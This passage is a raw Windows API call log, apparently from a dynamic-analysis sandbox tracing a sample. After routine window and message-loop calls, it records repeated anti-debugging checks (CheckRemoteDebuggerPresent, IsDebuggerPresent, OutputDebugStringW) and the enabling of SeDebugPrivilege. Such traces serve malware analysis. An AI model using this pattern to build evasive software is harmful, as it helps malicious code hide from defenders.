SetWindowLongW (hWnd=0x1013e, nIndex=-8, dwNewLong=65860) returned 65860 [0263.462] SendMessageW (hWnd=0x10144, Msg=0x80, wParam=0x1, lParam=0x4006f) returned 0x0 [0263.462] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0x80, wParam=0x1, lParam=0x4006f) returned 0x0 [0263.463] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0xd, wParam=0x104, lParam=0x496c5e0) returned 0x0 [0263.463] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0xd, wParam=0x104, lParam=0x496c5e0) returned 0x0 [0263.463] GetWindowLongW (hWnd=0x1013e, nIndex=-16) returned 650182656 [0263.463] GetWindowLongW (hWnd=0x1013e, nIndex=-16) returned 650182656 [0263.463] GetWindowLongW (hWnd=0x1013e, nIndex=-20) returned 65792 [0263.463] SetWindowLongW (hWnd=0x1013e, nIndex=-16, dwNewLong=570490880) returned 650182656 [0263.463] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x7c, wParam=0xfffffff0, lParam=0x43ed84) returned 0x0 [0263.463] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x7d, wParam=0xfffffff0, lParam=0x43ed84) returned 0x0 [0263.464] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x46, wParam=0x0, lParam=0x43e704) returned 0x0 [0263.464] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x83, wParam=0x1, lParam=0x43e6dc) returned 0x0 [0263.464] GetWindowPlacement (in: hWnd=0x1013e, lpwndpl=0x43e4b4 | out: lpwndpl=0x43e4b4) returned 1 [0263.464] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x47, wParam=0x0, lParam=0x43e704) returned 0x0 [0263.464] GetClientRect (in: hWnd=0x1013e, lpRect=0x43e464 | out: lpRect=0x43e464) returned 1 [0263.464] GetWindowRect (in: hWnd=0x1013e, lpRect=0x43e464 | out: lpRect=0x43e464) returned 1 [0263.464] SetWindowLongW (hWnd=0x1013e, nIndex=-20, dwNewLong=65536) returned 65536 [0263.464] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x7c, wParam=0xffffffec, lParam=0x43ed84) returned 0x0 [0263.464] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x7d, wParam=0xffffffec, lParam=0x43ed84) returned 0x0 [0263.465] SetWindowPos (hWnd=0x1013e, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0263.465] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x46, wParam=0x0, lParam=0x43eda4) returned 0x0 [0263.465] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x83, wParam=0x1, lParam=0x43ed7c) returned 0x0 [0263.465] GetWindowPlacement (in: hWnd=0x1013e, lpwndpl=0x43eb54 | out: lpwndpl=0x43eb54) returned 1 [0263.465] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x47, wParam=0x0, lParam=0x43eda4) returned 0x0 [0263.465] GetClientRect (in: hWnd=0x1013e, lpRect=0x43eb04 | out: lpRect=0x43eb04) returned 1 [0263.465] GetWindowRect (in: hWnd=0x1013e, lpRect=0x43eb04 | out: lpRect=0x43eb04) returned 1 [0263.466] RedrawWindow (hWnd=0x1013e, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0263.466] GetSystemMenu (hWnd=0x1013e, bRevert=0) returned 0x0 [0263.466] GetWindowPlacement (in: hWnd=0x1013e, lpwndpl=0x43eddc | out: lpwndpl=0x43eddc) returned 1 [0263.466] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0263.466] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0263.466] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x0) returned 1 [0263.466] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x0) returned 1 [0263.466] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0263.466] ShowWindow (hWnd=0x1013e, nCmdShow=2) returned 0 [0263.466] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x46, wParam=0x0, lParam=0x43ee50) returned 0x0 [0263.467] GetWindowPlacement (in: hWnd=0x1013e, lpwndpl=0x43ec00 | out: lpwndpl=0x43ec00) returned 1 [0263.467] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x47, wParam=0x0, lParam=0x43ee50) returned 0x0 [0263.467] GetClientRect (in: hWnd=0x1013e, lpRect=0x43ebb0 | out: lpRect=0x43ebb0) returned 1 [0263.467] GetWindowRect (in: hWnd=0x1013e, lpRect=0x43ebb0 | out: lpRect=0x43ebb0) returned 1 [0263.467] GetWindowTextLengthW (hWnd=0x1013e) returned 0 [0263.467] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0263.467] GetSystemMetrics (nIndex=42) returned 0 [0263.467] GetWindowTextW (in: hWnd=0x1013e, lpString=0x43ed4c, nMaxCount=1 | out: lpString="") returned 0 [0263.467] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xd, wParam=0x1, lParam=0x43ed4c) returned 0x0 [0263.468] SendMessageW (hWnd=0x1013e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0263.468] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0263.469] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x43ebb8 | out: lpdwProcessId=0x43ebb8) returned 0x534 [0263.469] GetCurrentThreadId () returned 0x534 [0263.470] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc10a [0263.470] PostMessageW (hWnd=0x1013e, Msg=0xc10a, wParam=0x0, lParam=0x0) returned 1 [0263.574] OleInitialize (pvReserved=0x0) returned 0x0 [0263.575] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x43ef6c | out: lplpMessageFilter=0x43ef6c*=0x0) returned 0x0 [0263.576] PeekMessageW (in: lpMsg=0x43ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x43ef40) returned 1 [0263.577] IsWindowUnicode (hWnd=0x1013e) returned 1 [0263.577] GetMessageW (in: lpMsg=0x43ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x43ef40) returned 1 [0263.577] TranslateMessage (lpMsg=0x43ef40) returned 0 [0263.578] DispatchMessageW (lpMsg=0x43ef40) returned 0x0 [0263.578] PeekMessageW (in: lpMsg=0x43ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x43ef40) returned 0 [0263.578] PeekMessageW (in: lpMsg=0x43ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x43ef40) returned 0 [0263.579] WaitMessage () Thread: id = 67 os_tid = 0x714 Thread: id = 68 os_tid = 0x718 [0255.051] CoGetContextToken (in: pToken=0x239f5bc | out: pToken=0x239f5bc) returned 0x800401f0 [0255.058] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 69 os_tid = 0x71c Thread: id = 70 os_tid = 0x578 [0258.476] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0259.035] GetCurrentProcessId () returned 0x530 [0259.035] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x224 [0259.035] GetExitCodeProcess (in: hProcess=0x224, lpExitCode=0x2496e0c | out: lpExitCode=0x2496e0c*=0x103) returned 1 [0259.035] CheckRemoteDebuggerPresent (in: hProcess=0x224, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0259.035] IsDebuggerPresent () returned 0 [0259.035] GetCurrentProcessId () returned 0x530 [0259.036] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x228 [0259.036] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x2496ec4 | out: lpExitCode=0x2496ec4*=0x103) returned 1 [0259.036] CloseHandle (hObject=0x228) returned 1 [0259.036] OutputDebugStringW (lpOutputString="") [0260.038] GetCurrentProcessId () returned 0x530 [0260.038] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x274 [0260.039] GetExitCodeProcess (in: hProcess=0x274, lpExitCode=0x24defbc | out: lpExitCode=0x24defbc*=0x103) returned 1 [0260.039] CheckRemoteDebuggerPresent (in: hProcess=0x274, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0260.039] IsDebuggerPresent () returned 0 [0260.039] GetCurrentProcessId () returned 0x530 [0260.039] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x268 [0260.040] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x24df074 | out: lpExitCode=0x24df074*=0x103) returned 1 [0260.040] CloseHandle (hObject=0x268) returned 1 [0260.040] OutputDebugStringW (lpOutputString="") [0261.055] GetCurrentProcessId () returned 0x530 [0261.055] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2c4 [0261.055] GetExitCodeProcess (in: hProcess=0x2c4, lpExitCode=0x24f5b34 | out: lpExitCode=0x24f5b34*=0x103) returned 1 [0261.055] CheckRemoteDebuggerPresent (in: hProcess=0x2c4, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0261.055] IsDebuggerPresent () returned 0 [0261.056] GetCurrentProcessId () returned 0x530 [0261.056] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2cc [0261.056] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0x24f5bec | out: lpExitCode=0x24f5bec*=0x103) returned 1 [0261.056] CloseHandle (hObject=0x2cc) returned 1 [0261.056] OutputDebugStringW (lpOutputString="") [0262.065] GetCurrentProcessId () returned 0x530 [0262.066] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2d0 [0262.066] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x24f5e14 | out: lpExitCode=0x24f5e14*=0x103) returned 1 [0262.066] CheckRemoteDebuggerPresent (in: hProcess=0x2d0, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0262.066] IsDebuggerPresent () returned 0 [0262.066] GetCurrentProcessId () returned 0x530 [0262.067] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2d4 [0262.067] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x24f5ecc | out: lpExitCode=0x24f5ecc*=0x103) returned 1 [0262.067] CloseHandle (hObject=0x2d4) returned 1 [0262.067] OutputDebugStringW (lpOutputString="") [0263.081] GetCurrentProcessId () returned 0x530 [0263.081] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e0 [0263.081] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x24f6f98 | out: lpExitCode=0x24f6f98*=0x103) returned 1 [0263.081] CheckRemoteDebuggerPresent (in: hProcess=0x2e0, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0263.081] IsDebuggerPresent () returned 0 [0263.081] GetCurrentProcessId () returned 0x530 [0263.081] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e4 [0263.082] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x24f7050 | out: lpExitCode=0x24f7050*=0x103) returned 1 [0263.082] CloseHandle (hObject=0x2e4) returned 1 [0263.082] OutputDebugStringW (lpOutputString="") [0264.281] GetCurrentProcessId () returned 0x530 [0264.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e8 [0264.281] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x24fc5a0 | out: lpExitCode=0x24fc5a0*=0x103) returned 1 [0264.281] CheckRemoteDebuggerPresent (in: hProcess=0x2e8, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0264.281] IsDebuggerPresent () returned 0 [0264.282] GetCurrentProcessId () returned 0x530 [0264.282] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2ec [0264.282] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x24fc658 | out: lpExitCode=0x24fc658*=0x103) returned 1 [0264.282] CloseHandle (hObject=0x2ec) returned 1 [0264.282] OutputDebugStringW (lpOutputString="") [0265.295] GetCurrentProcessId () returned 0x530 [0265.295] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f0 [0265.295] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x24fc88c | out: lpExitCode=0x24fc88c*=0x103) returned 1 [0265.296] CheckRemoteDebuggerPresent (in: hProcess=0x2f0, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0265.296] IsDebuggerPresent () returned 0 [0265.296] GetCurrentProcessId () returned 0x530 [0265.296] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f4 [0265.296] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x24fc944 | out: lpExitCode=0x24fc944*=0x103) returned 1 [0265.296] CloseHandle (hObject=0x2f4) returned 1 [0265.297] OutputDebugStringW (lpOutputString="") [0266.340] GetCurrentProcessId () returned 0x530 [0266.340] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f8 [0266.340] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x24fcb6c | out: lpExitCode=0x24fcb6c*=0x103) returned 1 [0266.340] CheckRemoteDebuggerPresent (in: hProcess=0x2f8, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0266.340] IsDebuggerPresent () returned 0 [0266.340] GetCurrentProcessId () returned 0x530 [0266.341] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2fc [0266.341] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x24fcc24 | out: lpExitCode=0x24fcc24*=0x103) returned 1 [0266.341] CloseHandle (hObject=0x2fc) returned 1 [0266.341] OutputDebugStringW (lpOutputString="") [0267.354] GetCurrentProcessId () returned 0x530 [0267.355] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x300 [0267.355] GetExitCodeProcess (in: hProcess=0x300, lpExitCode=0x24fce4c | out: lpExitCode=0x24fce4c*=0x103) returned 1 [0267.355] CheckRemoteDebuggerPresent (in: hProcess=0x300, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0267.355] IsDebuggerPresent () returned 0 [0267.355] GetCurrentProcessId () returned 0x530 [0267.355] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x304 [0267.355] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x24fcf04 | out: lpExitCode=0x24fcf04*=0x103) returned 1 [0267.355] CloseHandle (hObject=0x304) returned 1 [0267.355] OutputDebugStringW (lpOutputString="") [0269.725] GetCurrentProcessId () returned 0x530 [0269.725] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x308 [0269.725] GetExitCodeProcess (in: hProcess=0x308, lpExitCode=0x24fd12c | out: lpExitCode=0x24fd12c*=0x103) returned 1 [0269.725] CheckRemoteDebuggerPresent (in: hProcess=0x308, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0269.725] IsDebuggerPresent () returned 0 [0269.726] GetCurrentProcessId () returned 0x530 [0269.726] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x30c [0269.726] GetExitCodeProcess (in: hProcess=0x30c, lpExitCode=0x24fd1e4 | out: lpExitCode=0x24fd1e4*=0x103) returned 1 [0269.726] CloseHandle (hObject=0x30c) returned 1 [0269.726] OutputDebugStringW (lpOutputString="") [0271.067] GetCurrentProcessId () returned 0x530 [0271.067] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x310 [0271.067] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x24fd40c | out: lpExitCode=0x24fd40c*=0x103) returned 1 [0271.067] CheckRemoteDebuggerPresent (in: hProcess=0x310, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0271.067] IsDebuggerPresent () returned 0 [0271.067] GetCurrentProcessId () returned 0x530 [0271.067] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x314 [0271.067] GetExitCodeProcess (in: hProcess=0x314, lpExitCode=0x24fd4c4 | out: lpExitCode=0x24fd4c4*=0x103) returned 1 [0271.068] CloseHandle (hObject=0x314) returned 1 [0271.068] OutputDebugStringW (lpOutputString="") [0272.081] GetCurrentProcessId () returned 0x530 [0272.081] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x318 [0272.081] GetExitCodeProcess (in: hProcess=0x318, lpExitCode=0x24fd6ec | out: lpExitCode=0x24fd6ec*=0x103) returned 1 [0272.081] CheckRemoteDebuggerPresent (in: hProcess=0x318, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0272.081] IsDebuggerPresent () returned 0 [0272.081] GetCurrentProcessId () returned 0x530 [0272.082] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x31c [0272.082] GetExitCodeProcess (in: hProcess=0x31c, lpExitCode=0x24fd7a4 | out: lpExitCode=0x24fd7a4*=0x103) returned 1 [0272.082] CloseHandle (hObject=0x31c) returned 1 [0272.082] OutputDebugStringW (lpOutputString="") [0273.095] GetCurrentProcessId () returned 0x530 [0273.095] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x320 [0273.095] GetExitCodeProcess (in: hProcess=0x320, lpExitCode=0x24fd9cc | out: lpExitCode=0x24fd9cc*=0x103) returned 1 [0273.095] CheckRemoteDebuggerPresent (in: hProcess=0x320, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0273.095] IsDebuggerPresent () returned 0 [0273.096] GetCurrentProcessId () returned 0x530 [0273.096] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x324 [0273.096] GetExitCodeProcess (in: hProcess=0x324, lpExitCode=0x24fda84 | out: lpExitCode=0x24fda84*=0x103) returned 1 [0273.096] CloseHandle (hObject=0x324) returned 1 [0273.096] OutputDebugStringW (lpOutputString="") [0274.109] GetCurrentProcessId () returned 0x530 [0274.109] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x328 [0274.109] GetExitCodeProcess (in: hProcess=0x328, lpExitCode=0x24fdcac | out: lpExitCode=0x24fdcac*=0x103) returned 1 [0274.109] CheckRemoteDebuggerPresent (in: hProcess=0x328, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0274.109] IsDebuggerPresent () returned 0 [0274.109] GetCurrentProcessId () returned 0x530 [0274.109] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x32c [0274.110] GetExitCodeProcess (in: hProcess=0x32c, lpExitCode=0x24fdd64 | out: lpExitCode=0x24fdd64*=0x103) returned 1 [0274.110] CloseHandle (hObject=0x32c) returned 1 [0274.110] OutputDebugStringW (lpOutputString="") [0275.123] GetCurrentProcessId () returned 0x530 [0275.123] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x330 [0275.123] GetExitCodeProcess (in: hProcess=0x330, lpExitCode=0x24fdf8c | out: lpExitCode=0x24fdf8c*=0x103) returned 1 [0275.123] CheckRemoteDebuggerPresent (in: hProcess=0x330, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0275.123] IsDebuggerPresent () returned 0 [0275.123] GetCurrentProcessId () returned 0x530 [0275.124] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x334 [0275.124] GetExitCodeProcess (in: hProcess=0x334, lpExitCode=0x24fe044 | out: lpExitCode=0x24fe044*=0x103) returned 1 [0275.124] CloseHandle (hObject=0x334) returned 1 [0275.124] OutputDebugStringW (lpOutputString="") [0276.137] GetCurrentProcessId () returned 0x530 [0276.137] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x338 [0276.137] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x24fe26c | out: lpExitCode=0x24fe26c*=0x103) returned 1 [0276.137] CheckRemoteDebuggerPresent (in: hProcess=0x338, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0276.137] IsDebuggerPresent () returned 0 [0276.137] GetCurrentProcessId () returned 0x530 [0276.138] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x33c [0276.138] GetExitCodeProcess (in: hProcess=0x33c, lpExitCode=0x24fe324 | out: lpExitCode=0x24fe324*=0x103) returned 1 [0276.138] CloseHandle (hObject=0x33c) returned 1 [0276.138] OutputDebugStringW (lpOutputString="") [0277.192] GetCurrentProcessId () returned 0x530 [0277.193] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x340 [0277.193] GetExitCodeProcess (in: hProcess=0x340, lpExitCode=0x24fe54c | out: lpExitCode=0x24fe54c*=0x103) returned 1 [0277.193] CheckRemoteDebuggerPresent (in: hProcess=0x340, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0277.193] IsDebuggerPresent () returned 0 [0277.193] GetCurrentProcessId () returned 0x530 [0277.194] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x344 [0277.194] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x24fe604 | out: lpExitCode=0x24fe604*=0x103) returned 1 [0277.194] CloseHandle (hObject=0x344) returned 1 [0277.194] OutputDebugStringW (lpOutputString="") [0278.196] GetCurrentProcessId () returned 0x530 [0278.196] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x348 [0278.196] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x24fe838 | out: lpExitCode=0x24fe838*=0x103) returned 1 [0278.196] CheckRemoteDebuggerPresent (in: hProcess=0x348, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0278.196] IsDebuggerPresent () returned 0 [0278.196] GetCurrentProcessId () returned 0x530 [0278.197] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x34c [0278.197] GetExitCodeProcess (in: hProcess=0x34c, lpExitCode=0x24fe8f0 | out: lpExitCode=0x24fe8f0*=0x103) returned 1 [0278.197] CloseHandle (hObject=0x34c) returned 1 [0278.197] OutputDebugStringW (lpOutputString="") [0279.210] GetCurrentProcessId () returned 0x530 [0279.210] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x350 [0279.210] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x24feb18 | out: lpExitCode=0x24feb18*=0x103) returned 1 [0279.210] CheckRemoteDebuggerPresent (in: hProcess=0x350, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0279.210] IsDebuggerPresent () returned 0 [0279.211] GetCurrentProcessId () returned 0x530 [0279.211] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x354 [0279.211] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x24febd0 | out: lpExitCode=0x24febd0*=0x103) returned 1 [0279.211] CloseHandle (hObject=0x354) returned 1 [0279.211] OutputDebugStringW (lpOutputString="") [0280.224] GetCurrentProcessId () returned 0x530 [0280.225] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x360 [0280.225] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x24fedf8 | out: lpExitCode=0x24fedf8*=0x103) returned 1 [0280.225] CheckRemoteDebuggerPresent (in: hProcess=0x360, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0280.226] IsDebuggerPresent () returned 0 [0280.226] GetCurrentProcessId () returned 0x530 [0280.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x364 [0280.227] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x24feeb0 | out: lpExitCode=0x24feeb0*=0x103) returned 1 [0280.227] CloseHandle (hObject=0x364) returned 1 [0280.227] OutputDebugStringW (lpOutputString="") [0281.238] GetCurrentProcessId () returned 0x530 [0281.238] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x368 [0281.238] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x24ff0d8 | out: lpExitCode=0x24ff0d8*=0x103) returned 1 [0281.238] CheckRemoteDebuggerPresent (in: hProcess=0x368, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0281.238] IsDebuggerPresent () returned 0 [0281.239] GetCurrentProcessId () returned 0x530 [0281.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x36c [0281.239] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x24ff190 | out: lpExitCode=0x24ff190*=0x103) returned 1 [0281.239] CloseHandle (hObject=0x36c) returned 1 [0281.239] OutputDebugStringW (lpOutputString="") [0282.420] GetCurrentProcessId () returned 0x530 [0282.420] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x370 [0282.420] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x24ff3b8 | out: lpExitCode=0x24ff3b8*=0x103) returned 1 [0282.420] CheckRemoteDebuggerPresent (in: hProcess=0x370, pbDebuggerPresent=0x495f688 | out: pbDebuggerPresent=0x495f688) returned 1 [0282.420] IsDebuggerPresent () returned 0 [0282.420] GetCurrentProcessId () returned 0x530 [0282.421] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x374 [0282.421] GetExitCodeProcess (in: hProcess=0x374, lpExitCode=0x24ff470 | out: lpExitCode=0x24ff470*=0x103) returned 1 [0282.421] CloseHandle (hObject=0x374) returned 1 [0282.421] OutputDebugStringW (lpOutputString="") Thread: id = 71 os_tid = 0x590 [0258.514] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0258.542] GetCurrentProcessId () returned 0x530 [0258.656] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x4d7eabc | out: lpLuid=0x4d7eabc*(LowPart=0x14, HighPart=0)) returned 1 [0258.677] GetCurrentProcess () returned 0xffffffff [0258.678] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4d7eab8 | out: TokenHandle=0x4d7eab8*=0x21c) returned 1 [0258.682] AdjustTokenPrivileges (in: TokenHandle=0x21c, DisableAllPrivileges=0, NewState=0x2496298*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0258.682] CloseHandle (hObject=0x21c) returned 1 [0258.683] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x21c [0258.683] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2494b14 | out: lpExitCode=0x2494b14*=0x103) returned 1 [0258.706] CheckRemoteDebuggerPresent (in: hProcess=0x21c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0258.712] IsDebuggerPresent () returned 0 [0258.714] GetCurrentProcessId () returned 0x530 [0258.717] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x220 [0258.717] GetExitCodeProcess (in: hProcess=0x220, lpExitCode=0x2496c74 | out: lpExitCode=0x2496c74*=0x103) returned 1 [0258.726] 